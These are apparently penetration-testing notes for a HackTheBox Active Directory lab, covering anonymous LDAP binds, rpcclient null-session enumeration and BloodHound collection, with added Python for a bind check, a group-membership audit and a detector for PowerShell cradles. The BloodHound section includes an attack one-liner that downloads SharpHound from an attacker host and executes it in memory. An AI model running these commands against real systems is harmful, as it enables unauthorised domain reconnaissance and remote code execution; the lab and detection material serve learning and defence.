Tools
LDAP
ldapsearch
To check if anonymous binds are allowed, perform a simple LDAP bind without supplying any credentials and see whether it succeeds or fails:
ldapsearch -H ldap://10.10.10.161 -x -b 'dc=htb,dc=local' -s base
# -x simple auth (anonymous here, since no -D/-w is given), -b base DN to search from, -s scope (base = the base object only)
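The bind that `ldapsearch -x` performs with no `-D`/`-w` is a BindRequest with an empty DN and an empty simple password. The following is an added example (not part of the original notes) that hand-encodes that request in BER and decodes the BindResponse, so the check can be understood and unit-tested without a live server or any third-party LDAP library; the `build_bind_response` helper only fabricates server replies for offline testing.

```python
"""Anonymous LDAP simple-bind check, hand-encoded in BER (no ldap3 needed).

Added example, not part of the original notes. `ldapsearch -x` with no
-D/-w sends exactly this: BindRequest { version 3, name "", simple "" }.
"""
import socket

# resultCode values from RFC 4511 relevant to this check
LDAP_SUCCESS = 0
LDAP_OPERATIONS_ERROR = 1          # what AD returns for searches on an unbound connection
LDAP_INVALID_CREDENTIALS = 49
LDAP_UNWILLING_TO_PERFORM = 53


def _ber_len(n: int) -> bytes:
    """BER length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, value: bytes) -> bytes:
    return bytes([tag]) + _ber_len(len(value)) + value


def _ber_int(n: int, tag: int = 0x02) -> bytes:
    """Minimal two's-complement INTEGER (or ENUMERATED when tag=0x0A)."""
    return _tlv(tag, n.to_bytes(n.bit_length() // 8 + 1, "big", signed=True))


def build_anonymous_bind(message_id: int = 1) -> bytes:
    """LDAPMessage ::= SEQUENCE { messageID, BindRequest [APPLICATION 0] }."""
    bind = (_ber_int(3)              # version 3
            + _tlv(0x04, b"")        # name: empty DN
            + _tlv(0x80, b""))       # authentication: [0] simple, empty password
    return _tlv(0x30, _ber_int(message_id) + _tlv(0x60, bind))


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, value, next_pos) for the TLV starting at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_bind_response(data: bytes) -> dict:
    """Decode BindResponse [APPLICATION 1] { resultCode, matchedDN, diagnosticMessage }."""
    tag, msg, _ = _read_tlv(data, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage")
    _, msg_id, pos = _read_tlv(msg, 0)
    tag, resp, _ = _read_tlv(msg, pos)
    if tag != 0x61:
        raise ValueError("not a BindResponse (tag 0x%02x)" % tag)
    _, code, pos = _read_tlv(resp, 0)
    _, matched, pos = _read_tlv(resp, pos)
    _, diag, _ = _read_tlv(resp, pos)
    return {
        "message_id": int.from_bytes(msg_id, "big", signed=True),
        "result_code": int.from_bytes(code, "big", signed=True),
        "matched_dn": matched.decode("utf-8", "replace"),
        "diagnostic": diag.decode("utf-8", "replace"),
    }


def build_bind_response(message_id: int, result_code: int, diagnostic: bytes = b"") -> bytes:
    """Constructed server reply, used here only so the decoder can be tested offline."""
    body = _ber_int(result_code, tag=0x0A) + _tlv(0x04, b"") + _tlv(0x04, diagnostic)
    return _tlv(0x30, _ber_int(message_id) + _tlv(0x61, body))


def bind_accepted(response: bytes) -> bool:
    """True when the server answered the anonymous bind with resultCode success (0)."""
    return parse_bind_response(response)["result_code"] == LDAP_SUCCESS


def anonymous_bind_allowed(host: str, port: int = 389, timeout: float = 5.0) -> bool:
    """Live check against a directory server (not exercised by the offline test)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_anonymous_bind())
        return bind_accepted(s.recv(4096))
```

One caveat when reading the result against Active Directory: a DC normally accepts the anonymous bind itself (resultCode 0) but then rejects searches below the rootDSE on that connection unless the dsHeuristics attribute has been changed to permit anonymous access. The `ldapsearch` line above performs a base search after binding, so it is the stricter test; a bare bind succeeding tells you less than a base search succeeding.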
windapsearch
If LDAP is open, we can enumerate users, computers, and groups using windapsearch:
windapsearch -d htb.local --dc 10.10.10.161 -m users --attrs samaccountname | grep -i samaccountname
windapsearch -d htb.local --dc 10.10.10.161 -m computers
windapsearch -d htb.local --dc 10.10.10.161 -m groups | grep cn | awk -F\: '{print $2}'
RPC
If RPC is open, we can enumerate users, computers, and groups.
# Connect to RPC anonymously (null session: empty user, no password)
rpcclient -U "" -N 10.10.10.161
# Enumerate users
rpcclient $> enumdomusers
# Enumerate groups (output lists group name and RID)
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
# Query a group by RID
rpcclient $> querygroup 0x200
# Query group members (output lists member RIDs)
rpcclient $> querygroupmem 0x200
rid:[0x1f4] attr:[0x7]
# Query a user by RID
rpcclient $> queryuser 0x1f4
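rpcclient prints everything as `key:[value]` pairs, which makes the enumeration above easy to post-process. The following is an added example (not part of the original notes) that parses `enumdomusers`, `enumdomgroups` and `querygroupmem` output and cross-references the RIDs, so that accounts with a non-built-in RID (1000 and above) sitting in a group such as Domain Admins can be listed for review. The two group lines and the `rid:[0x1f4] attr:[0x7]` member line come from the notes; every other sample line (`Guest`, `svc_backup`, RID `0x453`) is constructed.

```python
"""Parse rpcclient output and audit group membership.

Added example, not part of the original notes. rpcclient prints
"key:[value]" pairs; this turns them into dicts and cross-references
group RIDs with user RIDs. Sample output is constructed except for the
two group lines and the member line taken from the notes.
"""
import re
from typing import Dict, List

PAIR = re.compile(r"(\w+):\[(.*?)\]")

WELL_KNOWN_RID_CEILING = 1000   # RIDs below 1000 are built-in accounts/groups


def parse_rpc_line(line: str) -> dict:
    """'group:[Domain Admins] rid:[0x200]' -> {'group': 'Domain Admins', 'rid': 512}."""
    out = {}
    for key, value in PAIR.findall(line):
        out[key] = int(value, 16) if value.lower().startswith("0x") else value
    return out


def parse_output(text: str) -> List[dict]:
    """Parse every line; prompt lines such as 'rpcclient $> ...' yield nothing and are dropped."""
    return [d for d in (parse_rpc_line(l) for l in text.splitlines()) if d]


def rid_map(text: str, key: str) -> Dict[int, str]:
    """Map RID -> name for enumdomusers (key='user') or enumdomgroups (key='group')."""
    return {d["rid"]: d[key] for d in parse_output(text) if key in d and "rid" in d}


def group_members(users_out: str, members_out: str) -> List[dict]:
    """Resolve querygroupmem RIDs to user names; unknown RIDs keep a placeholder name."""
    users = rid_map(users_out, "user")
    members = []
    for d in parse_output(members_out):
        rid = d["rid"]
        members.append({"rid": rid,
                        "name": users.get(rid, f"<rid {rid}>"),
                        "well_known": rid < WELL_KNOWN_RID_CEILING})
    return members


def custom_accounts_in(group_name: str, groups_out: str, users_out: str,
                       members_by_rid: Dict[int, str]) -> List[str]:
    """Names of non-built-in accounts that are members of the named group."""
    groups = rid_map(groups_out, "group")
    rid = next((r for r, n in groups.items() if n == group_name), None)
    if rid is None or rid not in members_by_rid:
        return []
    return [m["name"] for m in group_members(users_out, members_by_rid[rid])
            if not m["well_known"]]


# --- constructed sample session (group lines and first member line are from the notes) ---
USERS_OUT = """\
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[svc_backup] rid:[0x453]
"""
GROUPS_OUT = """\
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
"""
# querygroupmem output keyed by the group RID it was run against
MEMBERS_OUT = {0x200: "rid:[0x1f4] attr:[0x7]\nrid:[0x453] attr:[0x7]\n"}

if __name__ == "__main__":
    print(custom_accounts_in("Domain Admins", GROUPS_OUT, USERS_OUT, MEMBERS_OUT))
```

The well-known RID cut-off is what makes the audit useful: RID 500 (`0x1f4`, Administrator) and RID 512 (`0x200`, Domain Admins) are built-in, whereas anything at 1000 or above was created in this domain and deserves a second look when it appears in a privileged group.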
BloodHound
Load SharpHound.ps1 on the target to collect data; here it is pulled over HTTP from the attacker-controlled host 10.10.14.9 and executed in memory:
iex(new-object net.webclient).downloadstring("http://10.10.14.9/SharpHound.ps1")
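From the defender's side, the one-liner above is a textbook in-memory download cradle and is exactly what PowerShell script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) captures as ScriptBlockText. The following is an added example (not part of the original notes) that classifies script block text by looking for the combination of a remote fetch (`Net.WebClient.Download*`, `Invoke-WebRequest`) with `IEX`/`Invoke-Expression`, and separately notes any reference to the SharpHound/BloodHound collector. The sample entries are constructed, the first being the cradle from the notes.

```python
"""Flag in-memory PowerShell download cradles in script block log text.

Added example, not part of the original notes. Input is the ScriptBlockText
of PowerShell script block logging events (Event ID 4104 in
Microsoft-Windows-PowerShell/Operational); the sample entries are constructed.
"""
import re
from typing import Dict, List

INDICATORS = {
    # .NET WebClient pulling content from a URL
    "webclient_download": re.compile(r"net\.webclient.*?\.download(string|data|file)", re.I | re.S),
    # built-in cmdlets (and their aliases) that fetch remote content
    "web_cmdlet": re.compile(r"\b(invoke-webrequest|invoke-restmethod|iwr|irm)\b", re.I),
    # execution of a string as code
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    # collector named in the notes
    "sharphound": re.compile(r"sharphound|bloodhound", re.I),
}


def classify_script_block(text: str) -> Dict[str, object]:
    """Return a verdict plus the list of indicator names that matched."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    fetch = "webclient_download" in hits or "web_cmdlet" in hits
    if fetch and "invoke_expression" in hits:
        verdict = "in-memory download cradle"   # fetched code executed without touching disk
    elif fetch:
        verdict = "remote download"
    elif "sharphound" in hits:
        verdict = "collector reference"
    else:
        verdict = "none"
    return {"verdict": verdict, "hits": hits}


def scan(script_blocks: List[str]) -> List[dict]:
    """Return only the blocks that warrant a look, with their index for triage."""
    findings = []
    for i, text in enumerate(script_blocks):
        result = classify_script_block(text)
        if result["verdict"] != "none":
            findings.append({"index": i, **result})
    return findings


# constructed sample ScriptBlockText values; the first is the cradle from the notes
SAMPLE_BLOCKS = [
    'iex(new-object net.webclient).downloadstring("http://10.10.14.9/SharpHound.ps1")',
    "Get-ChildItem -Path C:\\Users -Recurse | Measure-Object",
    "(New-Object Net.WebClient).DownloadFile('http://example.invalid/tools.zip', 'C:\\tools.zip')",
    "Invoke-WebRequest -Uri http://example.invalid/installer.msi -OutFile C:\\Temp\\installer.msi",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_BLOCKS):
        print(finding)
```

The verdict tiers matter for triage: a plain remote download is common in administration scripts, while fetch-and-`IEX` in one statement almost never is, so the cradle tier is the one worth an alert and the collector name is corroboration rather than a detection on its own.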